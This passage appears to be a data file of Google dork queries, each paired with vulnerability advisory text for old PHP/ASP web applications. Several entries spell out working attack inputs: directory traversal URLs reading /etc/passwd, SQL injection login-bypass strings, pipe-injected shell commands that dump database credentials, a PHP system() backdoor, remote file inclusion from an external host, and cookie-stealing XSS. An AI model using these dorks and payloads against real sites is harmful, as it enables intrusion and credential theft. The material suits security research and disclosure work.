HTML/Wysiwyg Editor, Upload, categories, Multiple Users and more.Nearly all scripts suffer from possible sql injections. This may lead an attacker to change websites content or even worse, a login as an admin.vulnerable:"}, {"dork": "\"Enter ip\" inurl:\"php-ping.php\"", "description": "It has been reported that php-ping may be prone to a remote command execution vulnerability that may allow remote attackers to execute commands on vulnerable systems. The problem exists due to insufficient sanitization of shellmetacharacters via the 'count' parameter of php-ping.php script.report: http://www.securityfocus.com/bid/9309/info/sample: http://img64.exs.cx/my.php?loc=img64&image=phpping.jpg"}, {"dork": "intitle:welcome.to.horde", "description": "Horde Mail is web based email software, great for checking messages on the road. Several vulnerabilities were reported to Security Focus."}, {"dork": "\"BlackBoard 1.5.1-f | \u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00a9 2003-4 by Yves Goergen\"", "description": "bugtraq id 11336objectclass Input Validation Errorcve CVE-MAP-NOMATCHremote Yeslocal Nopublished Oct 06, 2004updated Oct 06, 2004vulnerable BlackBoard Internet Newsboard System BlackBoard Internet Newsboard System 1.5.1BlackBoard Internet Newsboard System is reported prone to a remote file include vulnerability. This issue presents itself because the application fails to sanitize user-supplied data properly. This issue may allow an attacker to include malicious files containing arbitrary script code to be executed on a vulnerable computer.BlackBoard Internet Newsboard System version 1.5.1 is reported prone to this vulnerability. It is possible that prior versions are affected as well."}, {"dork": "inurl:\"forumdisplay.php\" +\"Powered by: vBulletin Version 3.0.0..4\"", "description": "vBulletin is reported vulnerable to a remote SQL injection vulnerability. This issue is due to a failure of the application to properly validate user-supplied input prior to including it in an SQL query. An attacker may exploit this issue to manipulate and inject SQL queries onto the underlying database. It will be possible to leverage this issue to steal database contents including administrator password hashes and user credentials as well as to make attacks against the underlying database. Versions 3.0 through to 3.0.3 are reportedly affected by this issue.http://www.securityfocus.com/bid/11193"}, {"dork": "\"running: Nucleus v3.1\" -.nucleuscms.org -demo", "description": "Multiple unspecified vulnerabilities reportedly affect Nucleus CMS. A remote attacker may leverage these issues to steal cookie-based authentication credentials, reveal sensitive data and corrupt database contents. http://www.securityfocus.com/bid/11631"}, {"dork": "\"driven by: ASP Message Board\"", "description": "Multiple unspecified vulnerabilities reportedly affect the Infusium ASP Message Board. A remote attacker may leverage these issues to steal cookie-based authentication credentials, reveal sensitive data and corrupt database contents. vulnerable Infuseum ASP Message Board 2.2.1 cAdding the 2.2.1c seems to filter out some good positives, so I left it out."}, {"dork": "\"Obtenez votre forum Aztek\" -site:forum-aztek.com", "description": "Atztek Forum is a french forum system. Aztek Forum is reported prone to multiple input validation vulnerabilities. These issues may allow an attacker to carry out cross-site scripting and possibly other attacks.http://www.securityfocus.com/bid/11654"}, {"dork": "inurl:directorypro.cgi", "description": "A security vulnerability in the product allows attackers to perform a directory traversal attack and access files that reside outside the normal HTTP root directory.http://target/cgi-bin/directorypro.cgi?want=showcat&show=../../../../etc/passwd%00http://www.securityfocus.com/bid/2793"}, {"dork": "inurl:cal_make.pl", "description": "A security vulnerability in PerlCal allows remote attackers to access files that reside outside the normally bounding HTML root directory. http://www.securityfocus.com/bid/2663"}, {"dork": "\"Powered by PowerPortal v1.3\"", "description": "PowerPortal is reported vulnerable to remote SQL injection. This issue is due to a failure of the application to properly validate user-supplied input prior to including it in an SQL query. PowerPortal 1.3 is reported prone to this vulnerability, however, it is possible that other versions are affected as well. An example URI sufficient to exploit this vulnerability has been provided: http://www.example.com/pp13/index.php?index_page=and 1=1http://www.securityfocus.com/bid/11681"}, {"dork": "\"powered by minibb\" -site:www.minibb.net -intext:1.7f", "description": "miniBB is reported vulnerable to remote SQL injection. This issue is due to a failure of the application to properly validate user-supplied input prior to including it in an SQL query. miniBB versions prior to 1.7f are reported prone to this issue.http://www.securityfocus.com/bid/11688"}, {"dork": "intitle:\"View Img\" inurl:viewimg.php", "description": "It is reported that the 'viewing.php' script does not properly validate user-supplied input in the 'path' variable. A remote user can submit a specially crafted URL to view a list of files within an arbitrary directory. See http://securitytracker.com/alerts/2004/Nov/1012312.html for more information."}, {"dork": "+\"Powered by Invision Power Board v2.0.0..2\"", "description": "A remote SQL injection vulnerability affects Inivision Power Board. This issue is due to a failure of the application to properly validate user-supplied input prior to using it in an SQL query.http://www.securityfocus.com/bid/11719"}, {"dork": "+\"Powered by phpBB 2.0.6..10\" -phpbb.com -phpbb.pl", "description": "phpbb is vulnerable to SQL Injection, allowing people to minipulate the query into pulling data (such as passwords). Arbituary EXEC allows an attacker (if they get on to a new line), to execute their own PHP, which can be fatal."}, {"dork": "ext:php intext:\"Powered by phpNewMan Version\"", "description": "PHP News Manager is a multi-platform compatible solution for managing websites and multi-user access. Features weekly poll management, gallery management, partners list management, public news support, and a lot more. PHP News Manager is vulnerable to a directory traversal problem. path/to/news/browse.php?clang=../../../../../../file/i/want"}, {"dork": "\"Powered by WordPress\" -html filetype:php -demo -wordpress.org -bugtraq", "description": "Query: \"Powered by WordPress\" -html filetype:php -demo -wordpress.org -bugtraqBackground: WordPress is a blogging software which is vulnerable to a few SQL injection queries.http://securityfocus.com/bid/12066/exploit/"}, {"dork": "intext:Generated.by.phpix.1.0? inurl:$mode=album", "description": "Product: PHPix Version: 1.0Vuln: Directory traversalPHPix is a Web-based photo album viewer written in PHP. It features automatic generation of thumbnails and different resolution files for viewing on the fly. Synnergy Labs has found a flaw within PHPix that allows a user to successfully traverse the file system on a remote host, allowing arbitrary files/folders to be read. http://www.securiteam.com/unixfocus/6G00K0K04K.html"}, {"dork": "inurl:citrix/metaframexp/default/login.asp? ClientDetection=On", "description": "Citrix (http://citrix.com) is a web application that allows remote access via a client for companies, institutions, and government agencies to \"published\" folders, files, drives, and applications on the server and often the attached network. There is a XSS vulnerability in a widely used version of their Web Interface. As reported on Securiteam.com:http://www.securiteam.com/securitynews/6X0020K8VW.html A simple test is inlcluded in the advisory."}, {"dork": "\"SquirrelMail version 1.4.4\" inurl:src ext:php", "description": "date :Jan 30 2005 this search reveal the src/webmail.php which would allow acrafted URL to include a remote web page. This was assigned CAN-2005-0103by the Common Vulnerabilities and Exposures.-what can possibly be done :*A possible cross site scripting issue exists in src/webmail.php that isonly accessible when the PHP installation is running with register_globalsset to On.*A possible local file inclusion issue was uncovered by one of ourdevelopers involving custom preference handlers. This issue is onlyactive if the PHP installation is running with register_globals set to On."}, {"dork": "\"IceWarp Web Mail 5.3.0\" \"Powered by IceWarp\"", "description": "IceWarp Web Mail 5.3.0Multiple cross-site scripting and HTML injection vulnerabilities.http://www.securityfocus.com/bid/12396/"}, {"dork": "\"Powered by MercuryBoard [v1\"", "description": "Exploit for MercuryBoard:http://www.securityfocus.com/archive/1/389881/2005-02-06/2005-02-12/0Enter the following search:\"Powered by MercuryBoard [v1\"And the exploit does work!"}, {"dork": "\"delete entries\" inurl:admin/delete.asp", "description": "As described in OSVDB article #13715:\"AspJar contains a flaw that may allow a malicious user to delete arbitrary messages. The issue is triggered when the authentication method is bypassed and /admin/delete.asp is accessed directly. It is possible that the flaw may allow a malicious user to delete messages resulting in a loss of integrity.\"The company supporting this software is no longer in business and the software is no longer being updated. Therefore, versions should not matter in this dork."}, {"dork": "allintitle:aspjar.com guestbook", "description": "\"An input validation vulnerability was reported in the ASPJar guestbook. A remote user can gain administrative access and can delete guestbook messages.The '/admin/login.asp' script does not properly validate user-supplied input in the password field. A remote user can supply the following characters in password field to inject SQL commands and be authenticated as the administrator:\"' or ''='I also found another vulnerability that hasn't been documented anywhere. Using the above search to find aspjar guestbooks, appending the guestbook directory with /data/guest.mdb will give you a database containing the plaintext username and password for the guestbook admin and all entries in the guestbook, including IP addresses of users.(This company is no longer in business and the software is no longer being updated so versions shouldn't matter)"}, {"dork": "\"powered by CubeCart 2.0\"", "description": "This search reveals an alarming number of servers running versions of Brooky CubeCart that are reported to be prone to multiple vulnerabilities due to insufficient sanitization of user-supplied data....susceptible to a remote directory traversal vulnerability...cross-site scripting vulnerability may allow for theft of cookie-based authentication credentials or other attacks.An exploit is not required.The following proof of concept examples are available:http://www.example.com/index.php?&language=../../../../../../../../etc/passwdhttp://www.example.com/index.php?&language=var%20test_variable=31337;alert(test_variable); Vulnerability was published 2-14-2005http://www.securityfocus.com/bid/12549/"}, {"dork": "Powered.by:.vBulletin.Version ...3.0.6", "description": "vBulletin is reported prone to an arbitrary PHP script code execution vulnerability. The issue is reported to exist due to a lack of sufficient input sanitization performed on user-supplied data before this data is included in a dynamically generated scripthttp://www.securityfocus.com/bid/12622/info/"}, {"dork": "filetype:php intitle:\"paNews v2.0b4\"", "description": "PaNews is reported prone to a remote PHP script code execution vulnerability. It is reported that PHP script code may be injected into the PaNews software through the 'showcopy' parameter of the 'admin_setup.php' script. http://www.securityfocus.com/bid/12611"}, {"dork": "\"Powered by Coppermine Photo Gallery\" ( \"v1.2.2 b\" | \"v1.2.1\" | \"v1.2\" | \"v1.1\" | \"v1.0\")", "description": "Reportedly Coppermine Photo Gallery is prone to multiple input validation vulnerabilities, some of which may lead to arbitrary command execution. These issues are due to the application failing to properly sanitize and validate user-supplied input prior to using it in dynamic content and system command execution function calls.These issues may be exploited to steal cookie based authentication credentials, map the application root directory of the affected application, execute arbitrary commands and include arbitrary files. Other attacks are also possible.http://www.securityfocus.com/bid/10253/"}, {"dork": "intext:\"Powered by phpBB 2.0.13\" inurl:\"cal_view_month.php\"|inurl:\"downloads.php\"", "description": "phpBB 2.0.13 with installed Calendar Pro MOD are vulnerable to SQL injection attacks. An attacker can download the MD5 hashes from the account databse without authorization."}, {"dork": "intitle:\"osTicket :: Support Ticket System\"", "description": "osTicket is a widely-used open source support ticket system. It is a lightweight support ticket tool written mainly using PHP scripting language. There are several vulnerabilities in the osTicket software that may allow for an attacker to take control of the affected web server, disclose sensitive data from the database, or read arbitrary files. These issues have been reported to the developers and a new updated version of osTicket is available for download. All affected users should upgrade their osTicket installations immediately.http://www.addict3d.org/index.php?page=viewarticle&type=security&ID=3882"}, {"dork": "inurl:sphpblog intext:\"Powered by Simple PHP Blog 0.4.0\"", "description": "simple PHP Blog is vulnerable to mutiple attacks:Vulnerabilities:~~~~~~~~~~~~~~~~A. Full Path disclosuresB. XSS in search.phpC. Critical Information dislosures http://www.securityfocus.com/archive/1/395994"}, {"dork": "intitle:\"PowerDownload\" (\"PowerDownload v3.0.2 \u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00a9\" | \"PowerDownload v3.0.3 \u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00a9\" ) -site:powerscripts.org", "description": "The PowerDownload program (version 3.0.2 and 3.0.3) contains a serious vulnerability. Vulnerability discovery: SoulBlack - Security Research (http://soulblack.com.ar)Date: 05/31/2005Severity: High. Remote Users Can Execute Arbitrary Code.Affected version: v3.0.2 & v3.0.3vendor: http://www.powerscripts.org/* Fix *Contact the Vendor* References *http://www.soulblack.com.ar/repo/papers/advisory/powerdownload_advisory.txt"}, {"dork": "\"portailphp v1.3\" inurl:\"index.php?affiche\" inurl:\"PortailPHP\" -site:safari-msi.com", "description": "Vulnerability has been found in parameter \"id\". If this variableAny value it is possible to replace it with a sign ' is transferredSince this parameter is involved in all modules, all of themAre vulnerable.It occurs because of absence of a filtration of parameter id.Exampleshttp://example/index.php?affiche=News&id='[SQL inj]http://example/index.php?affiche=File&id='[SQL inj]http://example/index.php?affiche=Liens&id='[SQL inj]http://example/index.php?affiche=Faq&id='[SQL inj]The conclusionVulnerability is found out in version 1.3, on other versionsDid not check. Probably they too are vulnerable."}, {"dork": "intext:\"Powered by flatnuke-2.5.3\" +\"Get RSS News\" -demo", "description": "Description of VulnerabilitiesMultiple vulnerabilities in FlatNuke have been reported, which can be exploited by remote users to trigger denial of service conditions, execute arbitrary PHP code, conduct Cross-Site Scripting attacks and disclose arbitrary images and system information.If the \"/flatnuke/foot_news.php\" script is accessed directly a while() call is made that enters an infinite loop, leading to full CPU utilisation.[..]User-supplied input passed to the \"image\" parameter in the \"thumb.php\" script is not correctly validated. This can be exploited to disclose arbitrary images from external and local resources via directory traversal attacks, or to disclose the installation path.It is also possible to disclose the system path by accessing certain scripts directly or specially formed parameters."}, {"dork": "intext:\"Powered By: Snitz Forums 2000 Version 3.4.00..03\"", "description": "snitz Forum 2000 v 3.4.03 and older is vulnerable to many things including XSS. See http://www.gulftech.org/?node=research&article_id=00012-06162003. This is a sketchy search, finding vulnerable versions 3.4.00-3.4.03. Older versions are vulnerable as well."}, {"dork": "inurl:\"/login.asp?folder=\" \"Powered by: i-Gallery 3.3\"", "description": "i-Gallery 3.3 (and possibly older) is vulnerable to many things, including /../ traversals.http://www.packetstormsecurity.org/0506-exploits/igallery33.txt"}, {"dork": "intext:\"Calendar Program \u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00a9 Copyright 1999 Matt Kruse\" \"Add an event\"", "description": "This search finds all pages that allow you to add events in Mark Kruse's CalendarScript. This script seems to be VERY vulnerable to HTML injection techniques."}, {"dork": "\"powered by PhpBB 2.0.15\" -site:phpbb.com", "description": "Another php vulnerabilty, as seen here http://www.frsirt.com/exploits/20050704.phpbbSecureD.pl.phpphpBB 2.0.15 Viewtopic.PHP Remote Code Execution VulnerabilityThis exploit gives the user all the details about the databaseconnection such as database host, username, password anddatabase name."}, {"dork": "inurl:index.php fees shop link.codes merchantAccount", "description": "Vulnerability in EPay systemsPHP code includinghttp://targeturl/index.php?read=../../../../../../../../../../../../../../etc/passwdadvisory:http://www.cyberlords.net/advisories/cl_epay.txtEPay Pro version 2.0 is vulnerable to this issue."}, {"dork": "intitle:\"blog torrent upload\"", "description": "Blog Torrent is free, open-source software that provides a way to share large files on your website.vulnerability: free access to the password filehttp://[target]/[path_of_blog]/data/newusersadvisory:http://www.securitytracker.com/alerts/2005/Jul/1014449.htmlAll current versions could be vulnerable depending on directory permissions."}, {"dork": "\"Powered by Zorum 3.5\"", "description": "Zorum 3.5 remote code execution poc exploitsoftware:description: Zorum is a freely available, open source Web-based forumapplication implemented in PHP. It is available for UNIX, Linux, and any otherplatform that supports PHP script execution.author site: http://zorum.phpoutsourcing.com/1) remote code execution:vulnerable code, in /gorum/prod.php file:07 $doubleApp = isset($argv[1]); ...14 if( $doubleApp )15 {16 $appDir = $argv[1];17 system(\"mkdir $prodDir/$appDir\"); ...a user can execute arbitrary commands using pipe char, example:http://[target]/zorum/gorum/prod.php?argv[1]=|ls%20-lato list directorieshttp://[target]/zorum/gorum/prod.php?argv[1]=|cat%20../config.phpto see database username/password...http://[target]/zorum/gorum/prod.php?argv[1]=|cat%20/etc/passwdto see /etc/passwd file2) path disclosure:http://[target]/zorum/gorum/notification.phphttp://[target]/zorum/user.phphttp://[target]/zorum/attach.phphttp://[target]/zorum/blacklist.phphttp://[target]/zorum/forum.phphttp://[target]/zorum/globalstat.phphttp://[target]/zorum/gorum/trace.phphttp://[target]/zorum/gorum/badwords.phphttp://[target]/zorum/gorum/flood.phpand so on...googledork:\"Powered by Zorum 3.5\"rgodsite: http://rgod.altervista.orgmail: retrogod at aliceposta itoriginal advisory: http://rgod.altervista.org/zorum.html"}, {"dork": "\"Powered by FUDForum 2.6\" -site:fudforum.org -johnny.ihackstuff", "description": "FUDforum is prone to a remote arbitrary PHP file upload vulnerability.An attacker can merge an image file with a script file and upload it to an affected server.This issue can facilitate unauthorized remote access.FUDforum versions prior to 2.7.1 are reported to be affected. Currently Symantec cannot confirm if version 2.7.1 is affected as well.Affected versions:2.6.15 _ 2.6.14 _ 2.6.132.6.12 _ 2.6.10 _ 2.6.9 _ 2.6.82.6.7 _ 2.6.5 _ 2.6.4 _ 2.6.32.6.2 _ 2.6.1 _ 2.6"}, {"dork": "intitle:\"Looking Glass v20040427\" \"When verifying", "description": "Looking Glass v20040427 arbitrary commands execution / cross site scripting. description: Looking Glass is a pretty extensive web based network querying tool for use on php enabled servers. site: http://de-neef.net/articles.php?id=2&page=1download page: http://de-neef.net/download.php?file=2Read the full report here: http://rgod.altervista.org/lookingglass.html"}, {"dork": "\"powered by ITWorking\"", "description": "saveWebPortal 3.4 remote code execution / admin check bypass / remote fileinclusion / cross site scripting author site: http://www.circeos.itdownload page: http://www.circeos.it/frontend/index.php?page=downloadsa) remote code execution:a user can bypass admin check, calling this url:http://[target]/saveweb/admin/PhpMyExplorer/editerfichier.php?chemin=.&fichier=header.php&type=Sourcenow can leave a backdoor in header.php or some other file, example:after editing template, user can execute arbitrary system commands, through aurl like this:http://[target]/saveweb/header.php?command=ls%20-lato list directories...http://[target]/saveweb/header.php?command=cat%20config.inc.phpto see database username/password and admin panel username/password (now attacker have full access to site configuration... can go tohttp://[target]/saveweb/admin/to login...)http://[target]/saveweb/header.php?command=cat%20/etc/passwdto see passwd file...b) arbitrary file inclusion:a user can view any file on the target server,if not with .php extension:http://[target]/saveweb/menu_dx.php?SITE_Path=../../../../../boot.ini%00http://[target]/saveweb/menu_sx.php?CONTENTS_Dir=../../../../../boot.ini%00can execute arbitrary file resident on target server, if with .php extension,example :http://[target]/saveweb/menu_dx.php?SITE_Path=../../../../../[script].php%00http://[target]/saveweb/menu_sx.php?CONTENTS_Dir=../../../../../[script].php%00can craft a malicious url to cause victim user to execute commands on externalsite:http://[target]/saveweb/menu_dx.php?SITE_Path=http://[external_site]/cmd.gif%00http://[target]/saveweb/menu_sx.php?CONTENTS_Dir=http://[external_site]/cmd.gif%00where cmd.gif is a file like this:c) xss:c.1)http://[target]/saveweb/footer.php?TABLE_Width=>alert(document.cookie)http://[target]/saveweb/footer.php?SITE_Author_Domain=>alert(document.cookie)http://[target]/saveweb/footer.php?SITE_Author=>alert(document.cookie)http://[target]/saveweb/footer.php?L_Info=>alert(document.cookie)http://[target]/saveweb/footer.php?L_Help=>alert(document.cookie)http://[target]/saveweb/header.php?TABLE_Width=>alert(document.cookie)http://[target]/saveweb/header.php?L_Visitors=>alert(document.cookie)http://[target]/saveweb/header.php?count=>alert(document.cookie)http://[target]/saveweb/header.php?SITE_Logo=\">alert(document.cookie)http://[target]/saveweb/header.php?BANNER_Url=\">alert(document.cookie)http://[target]/saveweb/header.php?L_Sunday=\"}alert(document.cookie)"}, {"dork": "intitle:guestbook inurl:guestbook \"powered by Adva", "description": "Advanced Guestbook is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible."}, {"dork": "\"Powered by FUDForum 2.7\" -site:fudforum.org -johnny.ihackstuff", "description": "FUDforum is prone to a remote arbitrary PHP file upload vulnerability.An attacker can merge an image file with a script file and upload it to an affected server.This issue can facilitate unauthorized remote access.FUDforum versions prior to 2.7.1 are reported to be affected. Currently Symantec cannot confirm if version 2.7.1 is affected as well.Affected versions:2.7"}, {"dork": "\"Calendar programming by AppIdeas.com\" filetype:php", "description": "phpCommunityCalendar 4.0.3 (possibly prior versions) sql injection / login bypass / cross site scripting This search does not narrow to vulnerable versions.software:site: http://open.appideas.comdownload: http://open.appideas.com/Calendar/original advisory: http://rgod.altervista.org/phpccal.html"}, {"dork": "\"Powered by MD-Pro\" | \"made with MD-Pro\"", "description": "MAXdev MD-Pro 1.0.73 (possibly prior versions) remote code execution/ cross site scripting / path disclosure. This search does not find vulnerable versions.software:site: http://www.maxdev.com/description: http://www.maxdev.com/AboutMD.phtmloriginal advisory: http://rgod.altervista.org/maxdev1073.html"}, {"dork": "\"Software PBLang\" 4.65 filetype:php", "description": "my advisory:[quote]PBLang 4.65 (possibly prior versions) remote code execution / administrativecredentials disclosure / system information disclosure / cross site scripting /path disclosuresoftware:description: PBLang is a powerful flatfile Bulletin Board System. It combinesmany features of a professional board, but does not even require SQL support. Itis completely based on text-file.site: http://pblang.drmartinus.de/download: https://sourceforge.net/project/showfiles.php?group_id=629531) system disclosure:you can traverse directories and see any file (if not .php or .php3 etc.) andinclude any file on target system using '../' chars and null byte (%00), example:http://target]/[path]/pblang/setcookie.php?u=../../../../../etc/passwd%00vulnerable code in setcookie.php: ...16 $usrname=$HTTP_GET_VARS['u'];17 @include($dbpath.'/'.$usrname.'temp'); ...2) remote code execution:board stores data in files, when you register a [username] file without extensionis created in /db/members directory, inside we have php code executed when youlogin, so in location field type:madrid\"; system($HTTP_POST_VARS[cmd]); echo \"in /db/members/[username] file we have...$userlocation=\"madrid\"; system($HTTP_GET_VARS[cmd]); echo \"\";...no way to access the script directly, /db/members is .htaccess protectedand extra lines are deleted from files after you login, so you should makeall in a POST request and re-registerthis is my proof of concept exploit, to include [username] file I make a GET request of setcookie.php?u=[username]%00&cmd=[command] but you can call username file through some other inclusion surely when you surf the forum:http://rgod.altervista.org/pblang465.html 3)admin/user credentials disclosure:you can see password hash of any user or admin sending the command:cat ./db/members/[username]4) cross site scripting:register and in location field type:madrid\"; echo \"alert(document.cookie)then check this url:http://[target]/[path]/setcookie.php?u=[username]%005) path disclosure:http://[target]/[path]/setcookie.php?u=%00googledork: \"Software PBLang\" filetype:phprgodsite: http://rgod.altervista.orgmail: retrogod@aliceposta.itoriginal advisory: http://rgod.altervista.org/pblang465.html[/quote]"}, {"dork": "\"Powered by and copyright class-1\" 0.24.4", "description": "class-1 Forum Software v 0.24.4 Remote code executionsoftware: site: http://www.class1web.co.uk/softwaredescription: class-1 Forum Software is a PHP/MySQL driven web forum. It is written and distributedunder the GNU General Public License which means that its source is freely-distributedand available to the general public. vulnerability: the way the forum checks attachment extensions...look at the vulnerable code at viewforum.php 256-272 lines.nothing seems so strange, but... what happen if you try to upload a filewith this name? :shell.php.' or 'a' ='a;)[1] SQL INJECTION!The query and other queries like this become:SELECT * FROM [extensions table name] WHERE extension='' or 'a' ='a' AND file_type='Image'you have bypassed the check... now an executable file is uploaded, because for Apache, bothon Windows and Linux a file with that name is an executable php file...you can download a poc file from my site, at url:http://rgod.altervista.org/shell.zipinside we have:you can do test manually, unzip the file, register, login, post this file as attachment, thengo to this url to see the directory where the attachment has been uploaded:http://[target]/[path]/viewattach.phpyou will be redirected to:http://[target]/[path]/[upload_dir]/then launch commands:http://[target]/[path]/[upload_dir]/shell.php.'%20or%20'a'%20='a?command=cat%20/etc/passwdto see /etc/passwd filehttp://[target]/[path]/[upload_dir]/shell.php.'%20or%20'a'%20='a?command=cat%20./../db_config.incto see database username and passwordand so on...you can see my poc exploit at this url:http://www.rgod.altervista.org/class1.htmlgoogledork: \"Powered by and copyright class-1\"rgodsite: http://rgod.altervista.orgmail: retrogod [at] aliceposta . it"}, {"dork": "\"Powered by AzDg\" (2.1.3 | 2.1.2 | 2.1.1)", "description": "AzDGDatingLite V 2.1.3 (possibly prior versions) remote code execution software: site: http://www.azdg.com/ download page: http://www.azdg.com/scripts.php?l=english description:\" AzDGDatingLite is a Free dating script working on PHP and MySQL. Multilanguage, Multitemplate, quick/simple search, feedback with webmaster, Admin maillist, Very customizable \" etc. vulnerability: look at the vulnerable code in ./include/security.inc.php at lines ~80-90 ... else { if (isset($l) && file_exists(C_PATH.'/languages/'.$l.'/'.$l.'.php') && $l != '') { include_once C_PATH.'/languages/'.$l.'/'.$l.'.php'; include_once C_PATH.'/languages/'.$l.'/'.$l.'_.php'; } ... you can include arbitrary file on the server using \"../\" and null byte (%00) (to truncate path to the filename you choose), example: http://[target]/[path]/azdg//include/security.inc.php?l=../../../../../../../[filename.ext]%00 at the begin of the script we have: @ob_start(); look at the php ob_ start man page : \"This function will turn output buffering on. While output buffering is active no output is sent from the script (other than headers), instead the output is stored in an internal buffer.\" However, this is not a secure way to protect a script: buffer is never showned, so you cannot see arbitrary file from the target machine this time ... but you can execute arbirtrary commands and after to see any file :) : when you register to azdg you can upload photos, so you can upload and include a gif or jpeg file like this: usually photos are uploaded to ./members/uploads/[subdir]/[newfilename].[ext] azdg calculates [subdir] & [newfilename] using date(), time() and rand() functions you cannot calculate but you can retrieve the filename from azdg pages when file is showned on screen (!), so you can do this: http://[target]/[path]/azdg//include/security.inc.php?l=../../../members/uploads/[subdir]/[filename.ext]%00&cmd=cat%20/etc/passwd the output will be redirected to ./include/temp.txt so you make a GET request of this file and you have /etc/passwd file you can find my poc exploit at this url:http://rgod.altervista.org/azdg.html"}, {"dork": "\"Powered by: Land Down Under 800\" | \"Powered by: Land Down Under 801\" - www.neocrome.net", "description": "Land Down Under is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.http://secunia.com/advisories/16878/"}, {"dork": "\"Copyright 2004 \u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00a9 Digital Scribe v.1.4\"", "description": "Digital Scribe v1.4 Login Bypass / SQL injection / remote code executionsoftware site: http://www.digital-scribe.org/description: \"Teachers have full control through a web-based interface. Designedfor easy installation and even easier use, the Digital Scribe has been used in thousands of schools. No teacher or IT Personnel needs to know any computer languages in order to install and use this intuitive system.rgodsite: http://rgod.altervista.orgemail: retrogod at aliceposta it"}, {"dork": "\"Powered by PHP Advanced Transfer Manager v1.30\"", "description": "PHP Advanced Transfer Manager v1.30 underlying system disclosure / remote command execution / cross site scriptingrgodsite: http://rgod.altervista.orgmail: retrogod at aliceposta it"}, {"dork": "\"Powered by CuteNews\"", "description": "CuteNews 1.4.0 (possibly prior versions) remote code executionsoftware site: http://cutephp.com/description: \"Cute news is a powerful and easy for using news management system that use flat files to store its database. It supports comments, archives, search function, image uploading, backup function, IP banning, flood protection ...\"rgodsite: http://rgod.altervista.orgmail: retrogod [at] aliceposta it"}, {"dork": "\"Mimicboard2 086\"+\"2000 Nobutaka Makino\"+\"password\"+\"message\" inurl:page=1", "description": "Mimicboard2 is prone to multiple HTML injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content."}, {"dork": "\"Maintained with Subscribe Me 2.044.09p\"+\"Professional\" inurl:\"s.pl\"", "description": "subscribe Me Pro 2.0.44.09p is prone to a directory traversal vulnerability. This is due to a lack of proper sanitization of user-supplied input. Exploitation of this vulnerability could lead to a loss of confidentiality as arbitrary files are disclosed to an attacker. Information obtained through this attack may aid in further attacks against the underlying system.http://www.securityfocus.com/bid/14817/exploit"}, {"dork": "\"Powered by autolinks pro 2.1\" inurl:register.php", "description": "AutoLinksPro is a linking solution. AutoLinksPro link exchange software was built for the search engines to help improve your search engine rankings, traffic, and sales.Remote PHP File Include Vulnerabilityhttp://www.securityfocus.com/archive/1/409529/30/120/threaded"}, {"dork": "intitle:\"PHP TopSites FREE Remote Admin\"", "description": "PHP TopSites is a PHP/MySQL-based customizable TopList script. Main features include: Easy configuration config file; MySQL database backend; unlimited categories, Site rating on incoming votes; Special Rating from Webmaster; anti-cheating gateway; Random link; Lost password function; Webmaster Site-approval; Edit site; ProcessingTime display; Cookies Anti-Cheating; Site Reviews; Linux Cron Free; Frame Protection and much more.PHP TopSites Discloses Configuration Data to Remote Users:http://www.securitytracker.com/alerts/2005/Jul/1014552.htmlPS: all versions are vulnerable at time of writing."}, {"dork": "Powered by PHP-Fusion v6.00.109 \u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00a9 2003-2005. -php-fusion.co.uk", "description": "this is the dork: Powered by PHP-Fusion v6.00.109 \u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00a9 2003-2005. -php-fusion.co.ukas it is, without quotes, for the version I tested, prone toSQL Injection / administrative credentials disclosurethis my advisory/poc exploit: http://rgod.altervista.org/phpfusion600109.html"}, {"dork": "\"Powered By: lucidCMS 1.0.11\"", "description": "Lucid CMS 1.0.11 SQL Injection /Login bypassthis is the dork for ther version I tested:\"Powered By: lucidCMS 1.0.11\"advisory/poc exploit:http://rgod.altervista.org/lucidcms1011.htmlwe have an XSS even:http://packetstorm.linuxsecurity.com/0509-exploits/lucidCMS.txt"}, {"dork": "\"News generated by Utopia News Pro\" | \"Powered By: Utopia News Pro\"", "description": "Utopia News Pro 1.1.3 (and prior versions) SQL Injection & XSSadvisory & poc exploit:http://rgod.altervista.org/utopia113.html"}, {"dork": "intitle:Mantis \"Welcome to the bugtracker\" \"0.15 | 0.16 | 0.17 | 0.18\"", "description": "cross site scripting and sql injection vunerabilities were discovered in Mantis versions 0.19.2 or less. Mantis is a web-based bugtracking system written in PHP. Vunerability report athttp://search.securityfocus.com/archive/1/411591/30/0/threaded"}, {"dork": "\"Cyphor (Release:\" -www.cynox.ch", "description": "Cyphor 0.19 (possibly prior versions) SQL Injection / Board takeover / cross site scriptingmy advisory & poc exploit:http://rgod.altervista.org/cyphor019.htmlrgodModerator PS: The software is longer maintained."}, {"dork": "\"Welcome to the versatileBulletinBoard\" | \"Powered by versatileBulletinBoard\"", "description": "versatileBulletinBoard V1.0.0 RC2 (possibly prior versions)multiple SQL Injection vulnerabilities / login bypass / cross site scripting / information disclosureadvisory:http://rgod.altervista.org/versatile100RC2.html"}, {"dork": "inurl:\"wfdownloads/viewcat.php?list=\"", "description": "XOOPS WF_Downloads (2.05) module SQL injectionThis a specific dork, that searches XOOPS sites with WF_Downloads module installed, advisory & poc exploit:http://rgod.altervista.org/xoops_xpl.html"}, {"dork": "\"powered by GuppY v4\"|\"Site cr\u00c3\u0192\u00c6\u2019\u00c3\u201a\u00c2\u00a9\u00c3\u0192\u00c6\u2019\u00c3\u201a\u00c2\u00a9 avec GuppY v4\"", "description": "Guppy remote code execution / various arbitrary inclusion issuesadvisory & poc exploit:http://rgod.altervista.org/guppy459_xpl.html"}, {"dork": "\"2005 SugarCRM Inc. All Rights Reserved\" \"Powered By SugarCRM\"", "description": "this is the 